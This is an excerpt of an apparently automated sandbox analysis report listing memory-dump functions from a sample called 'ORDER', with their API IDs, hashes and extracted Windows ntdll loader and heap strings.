                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                          • API String ID: 3446177414-204845295
                          • Opcode ID: 38d3bd0df1daabd58d28b463241e51f0618b8192cc6d64fabfe679d4bacb98ba
                          • Instruction ID: 0b91a746b81c5f07075b034fa505cfc1cbd34241c092747a9aa60b3ff9e86d2a
                          • Opcode Fuzzy Hash: 38d3bd0df1daabd58d28b463241e51f0618b8192cc6d64fabfe679d4bacb98ba
                          • Instruction Fuzzy Hash: 9051C3712497009FE715CF24D890F9BB7E4EF88744F404D1DFAA5972A0DA70EA85CB92
                          Strings
                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3241D06F
                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3241D202
                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3241D0E6
                          • h.D2, xrefs: 3247A5D2
                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3241D263
                          • @, xrefs: 3241D09D
                          • @, xrefs: 3241D24F
                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 3241D136
                          • @, xrefs: 3241D2B3
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.D2
                          • API String ID: 0-3420205679
                          • Opcode ID: c4250fda2b3f9f64d4a5ee7934fc43d86b1a9c6c0f4858d1d98a24be739959f3
                          • Instruction ID: f54ba21d269578beb31c2f337b13c98982f75bdbaa4d6483c2a29a5ed908b3cf
                          • Opcode Fuzzy Hash: c4250fda2b3f9f64d4a5ee7934fc43d86b1a9c6c0f4858d1d98a24be739959f3
                          • Instruction Fuzzy Hash: FFA14DB1508355DFE321CF25C540B9BB7E8AF88759F00492EFA9896240DBB9D948CF93
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$\SysWOW64$minkernel\ntdll\ldrutil.c$xt?2
                          • API String ID: 0-1358922150
                          • Opcode ID: d945518197016a0e45cef429721dacadb158380218771fb63885174f573c71e1
                          • Instruction ID: ff85c0b1de36d3d9cc1a5a8e7e538b1dccfe8e2b0c05d26a43aa8abc730006e7
                          • Opcode Fuzzy Hash: d945518197016a0e45cef429721dacadb158380218771fb63885174f573c71e1
                          • Instruction Fuzzy Hash: 7BC259B4A017298FDB25CF15CC807AAB7B5BF48708F4041EADA49AB341EB719AD1CF54
                          APIs
                          • RtlDebugPrintTimes.NTDLL ref: 3244D879
                            • Part of subcall function 32424779: RtlDebugPrintTimes.NTDLL ref: 32424817
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                          • API String ID: 3446177414-1975516107
                          • Opcode ID: 7d183411d4a5172952d31d458740987b229ac6792fefd6a72373b8ef11dab421
                          • Instruction ID: 8d3520891c06d4fd1ab8e604f58898cd7fc0b0a8c112c4d2e7b69e0d57ad7539
                          • Opcode Fuzzy Hash: 7d183411d4a5172952d31d458740987b229ac6792fefd6a72373b8ef11dab421
                          • Instruction Fuzzy Hash: 0551FE75A05745DFEB05CFA4C480B9DBBB1BF48318F668459E8016B381DBB4AA86CF80
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                          • API String ID: 0-2224505338
                          • Opcode ID: 05ea20a79264afc0af5808158e3b1ad9b69e4146bef4ff11c7cbb27d4ad975f5
                          • Instruction ID: 97ee420b81a8807de2f22a42042e439293ac92b14951b5e3f692cbcc7bbe0afd
                          • Opcode Fuzzy Hash: 05ea20a79264afc0af5808158e3b1ad9b69e4146bef4ff11c7cbb27d4ad975f5
                          • Instruction Fuzzy Hash: 5151053A221754FFE715DF98D844F5A77A4EF08B64F1284AAF4019B319CB79E942CE10
                          Strings
                          • VerifierDebug, xrefs: 324A8925
                          • HandleTraces, xrefs: 324A890F
                          • AVRF: -*- final list of providers -*- , xrefs: 324A880F
                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 324A86E7
                          • VerifierFlags, xrefs: 324A88D0
                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 324A86BD
                          • VerifierDlls, xrefs: 324A893D
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                          • API String ID: 0-3223716464
                          • Opcode ID: 7208a325afd6407c8e36dffa153f54a8c6314f8b59c34866fde1b20a45203fee
                          • Instruction ID: be79680d52d2b96b9998636194059527e6938e6ff9bac36f436e79373d370747
                          • Opcode Fuzzy Hash: 7208a325afd6407c8e36dffa153f54a8c6314f8b59c34866fde1b20a45203fee
                          • Instruction Fuzzy Hash: 4F916776542751AFE715CF2498A0B5AB7A8FF68714F41486CF9406B340CB70EE45CB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-523794902
                          • Opcode ID: d1e472b951ae72efd4a1ee346f494c3606cd9ed513e7817d71566b11374cc7aa
                          • Instruction ID: 3bb0c551151cc7a07d0e115d0cbe407e1f7fa8784a8f8ba4c1345678bc9864a5
                          • Opcode Fuzzy Hash: d1e472b951ae72efd4a1ee346f494c3606cd9ed513e7817d71566b11374cc7aa
                          • Instruction Fuzzy Hash: 3942FF75214781DFD306CF28C884B5ABBE5FF88348F05496DE8A58B352DB74E982CB52
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.D2
                          • API String ID: 0-3671444071
                          • Opcode ID: 3567fa2479401e1fecf891f03afff6635259dcb36608d566af382495d04c4bb1
                          • Instruction ID: 6c96ac36d74e604d59ec5132848890898cd6441b2f4943ed65efa1203a5a5880
                          • Opcode Fuzzy Hash: 3567fa2479401e1fecf891f03afff6635259dcb36608d566af382495d04c4bb1
                          • Instruction Fuzzy Hash: BCF13BB6D11219EFEF05CF98C980ADEBBB8EF18754F50405AE911E7210EEB59E01CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                          • API String ID: 0-122214566
                          • Opcode ID: e5087a9f1d544f01feecaab06f747f532a0a360e61533bef306fb2203e58e797
                          • Instruction ID: 08b360ae3ea5db12d4eadcb85573133219a9b60a16377294b7c0b5fa190e4f1a
                          • Opcode Fuzzy Hash: e5087a9f1d544f01feecaab06f747f532a0a360e61533bef306fb2203e58e797
                          • Instruction Fuzzy Hash: 4AC13775A02319ABEB078B65C880BBEB760AF49344F508169EE019F390DFB5CDA5C391
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-792281065
                          • Opcode ID: f5dffae1a4f4a455d54b21c51da74d289a5e4c243bd26d899380343f3ccb15db
                          • Instruction ID: 864e156d1cf02b66ec2ae15b371e920f770977ca64f3c882bc19cc2796a95f18
                          • Opcode Fuzzy Hash: f5dffae1a4f4a455d54b21c51da74d289a5e4c243bd26d899380343f3ccb15db
                          • Instruction Fuzzy Hash: B3914770A42315EBFB19CF14C844BDA7FA1AF46768F10006DEA556B3C1DBB46A82CF90
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-4253913091
                          • Opcode ID: cc8d44fad4e145865068838d97675a63fe843558bee7e04f1933b9dcd861a012
                          • Instruction ID: 94dc735d938eb5c88cd430c7dfe36767f88e3bc16281f43f790efba35c66ad2d
                          • Opcode Fuzzy Hash: cc8d44fad4e145865068838d97675a63fe843558bee7e04f1933b9dcd861a012
                          • Instruction Fuzzy Hash: CCF1C074A01705DFEB0ACF68C890B6AB7B5FF48344F108258E6469B381DB35E991CF90
                          APIs
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 324980F3
                          • Failed to reallocate the system dirs string !, xrefs: 324980E2
                          • LdrpInitializePerUserWindowsDirectory, xrefs: 324980E9
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                          • API String ID: 3446177414-1783798831
                          • Opcode ID: 121db887473e3da103f0822038d4610167928dcadfc81d321bbf0b3df9566164
                          • Instruction ID: 09f0232e228f0b3b771ca684bed87568f527beacbbc2c6c8dafeabd009dac297
                          • Opcode Fuzzy Hash: 121db887473e3da103f0822038d4610167928dcadfc81d321bbf0b3df9566164
                          • Instruction Fuzzy Hash: 4041C6B5542300ABDB11DF24DC40B4B7BE8EF48B50F10992EF998E7251EB70EA55CB91
                          APIs
                          Strings
                          • minkernel\ntdll\ldrredirect.c, xrefs: 324A4519
                          • LdrpCheckRedirection, xrefs: 324A450F
                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 324A4508
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                          • API String ID: 3446177414-3154609507
                          • Opcode ID: 23fdfc009561e2e50ebf7254a3d0df148f67f2b883d6b672c62ea7da2c5f3517
                          • Instruction ID: 8f7bc230a2df59928aee3d8d9ebce03f4e7a377b65bba0320b12fa4b4c545492
                          • Opcode Fuzzy Hash: 23fdfc009561e2e50ebf7254a3d0df148f67f2b883d6b672c62ea7da2c5f3517
                          • Instruction Fuzzy Hash: 6141F0766053119FDB11CF58E860A5A7BE4AFA8794F050A6DFC98EB351DB30EC41CB81
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlReAllocateHeap
                          • API String ID: 0-941669491
                          • Opcode ID: 7adf4576605510a9d2cfd095d530fd46dba901c7f70cd4fc1fd20f16181ea00f
                          • Instruction ID: c02de8db12e8229d0291315de73adf2b16c730b545f9bb179ebdf82b40bb82c0
                          • Opcode Fuzzy Hash: 7adf4576605510a9d2cfd095d530fd46dba901c7f70cd4fc1fd20f16181ea00f
                          • Instruction Fuzzy Hash: 5801F736125290BEF3098B2CF408FC67BA4DF45775F24849EF0104BB91DFA6B986D660
                          APIs
                          Strings
                          • kLsE, xrefs: 324205FE
                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32420586
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                          • API String ID: 3446177414-2547482624
                          • Opcode ID: 3b74fbbd7d92d506344dadf2135f2cda0626ec59137f2f14adca0fba465b6b70
                          • Instruction ID: 826669b91b1e17de938285d7651e48b44c1034eae986fcce241e999f61ae9ccf
                          • Opcode Fuzzy Hash: 3b74fbbd7d92d506344dadf2135f2cda0626ec59137f2f14adca0fba465b6b70
                          • Instruction Fuzzy Hash: 1F51D1B5A00746DFEB14DFA6C4407EBB7F8AF54304F00993ED9A593240EB74A685CBA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                          • API String ID: 0-379654539
                          • Opcode ID: ddd2480fd398b3f7ddeee14af1a2e997e9959bdb3c8818772a5fe0d5a3a3bc99
                          • Instruction ID: 775d4550da430137f968d7b6fa4b2cd70978c9956531e9e8192c8d0867b01a79
                          • Opcode Fuzzy Hash: ddd2480fd398b3f7ddeee14af1a2e997e9959bdb3c8818772a5fe0d5a3a3bc99
                          • Instruction Fuzzy Hash: 8FC187741183928FE715CF2AC540B5AB7E4BF88748F00896EFC858B350EB75C98ACB56
                          Strings
                          • @, xrefs: 324584B1
                          • minkernel\ntdll\ldrinit.c, xrefs: 32458341
                          • LdrpInitializeProcess, xrefs: 32458342
                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3245847E
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1918872054
                          • Opcode ID: c19146b895b04cd767547995123557e04021d38f88a8e7d5293ae4e9493b97e9
                          • Instruction ID: e8713863f8e9476404da4c81e148c03e246b341def1a090162c949445f01177a
                          • Opcode Fuzzy Hash: c19146b895b04cd767547995123557e04021d38f88a8e7d5293ae4e9493b97e9
                          • Instruction Fuzzy Hash: 5C919F71509345AFE721DF21D840FABBBECAF88788F40492DFAC592141EB75D984CB62
                          Strings
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 324920C0
                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32491FE3, 324920BB
                          • SXS: %s() passed the empty activation context, xrefs: 32491FE8
                          • .Local, xrefs: 324527F8
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                          • API String ID: 0-1239276146
                          • Opcode ID: f94f61539e5ef2dd9a2fb172878de66ec1d0c230070ffae2746e709e63aafc1f
                          • Instruction ID: c7e009e7f2b6480c90604671a90a9f7325918de49d3dbe31dc923e11183211f9
                          • Opcode Fuzzy Hash: f94f61539e5ef2dd9a2fb172878de66ec1d0c230070ffae2746e709e63aafc1f
                          • Instruction Fuzzy Hash: 44A1D175A01329ABDB24CFA4DC84B99B7B0BF58318F2001EAD948A7355DB749EC5CF90
                          Strings
                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32480DEC
                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32480E2F
                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32480EB5
                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32480E72
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                          • API String ID: 0-1468400865
                          • Opcode ID: 45e9b32c16e60d05e97f03bc4c463e9f5cae81789a869d6a3e73471c544450ab
                          • Instruction ID: e4cc2ff51e7125aeae31eaa4a0e6c7a3b5a67ac59978dfb016cfd93fe0f0b97e
                          • Opcode Fuzzy Hash: 45e9b32c16e60d05e97f03bc4c463e9f5cae81789a869d6a3e73471c544450ab
                          • Instruction Fuzzy Hash: F171DFB1904304AFE750CF15C884F8B7BA8EF847A4F400868FD998B24AD775E589CBD2
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                          • API String ID: 2994545307-1391187441
                          • Opcode ID: 6f1c0b0973a7a8dac7b4219246016cea26eadd91923b4d551fce52e66fc1993b
                          • Instruction ID: 4e38e3bacf83ad8d1076a4d3bbe5fe2b3864293e62dd8c09b348a5badbf11437
                          • Opcode Fuzzy Hash: 6f1c0b0973a7a8dac7b4219246016cea26eadd91923b4d551fce52e66fc1993b
                          • Instruction Fuzzy Hash: 4731D936910204FFE701CB99DC84FDAB7B8EF45774F1580A5E825A7351DB71E981CA60
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eE2
                          • API String ID: 0-2804839016
                          • Opcode ID: 76f32a39945d4f2ebdff97751c73f9c66dc3144fdcbd35409db3b406f0ab5cf1
                          • Instruction ID: 5312562edf2cdcf9702ce548ff8bdc6f1b1df4dde7a0374a07e14b37f5dac862
                          • Opcode Fuzzy Hash: 76f32a39945d4f2ebdff97751c73f9c66dc3144fdcbd35409db3b406f0ab5cf1
                          • Instruction Fuzzy Hash: 2B317371901619BBDB12CF95CC44EEEBBBDEB84B58F104029E514AB260DB74DE45CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                          • API String ID: 0-1880532218
                          • Opcode ID: 83008b3c3fdf27f1f1cceac44d3483b3ccf285061637c0642ef7609aff99c261
                          • Instruction ID: 0552870fb77744292a38e51dcd9cb0234c62f8cc3496154a5d82f65863acb893
                          • Opcode Fuzzy Hash: 83008b3c3fdf27f1f1cceac44d3483b3ccf285061637c0642ef7609aff99c261
                          • Instruction Fuzzy Hash: DE21487AA01610ABD701CB58DE51BAEB3F5AF54F48F488079E80DAB381EBB4D901CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: b1667cd87e42648019b4d1db7dd7c7a3a4cae94877b1a5c4e3d67f5e942edf9f
                          • Instruction ID: 12f1f56e34ae589537337be16e894ac6c45dc274de619eb6aa074db44aafc2b3
                          • Opcode Fuzzy Hash: b1667cd87e42648019b4d1db7dd7c7a3a4cae94877b1a5c4e3d67f5e942edf9f
                          • Instruction Fuzzy Hash: 54512334A10715EFEB09CF65C944BADB7B0BF44715F10412AE90697390DFB49986CF80
                          Strings
                          • HEAP: , xrefs: 3247F6BE
                          • HEAP[%wZ]: , xrefs: 3247F6B1
                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 3247F6D3
                          Memory Dump Source
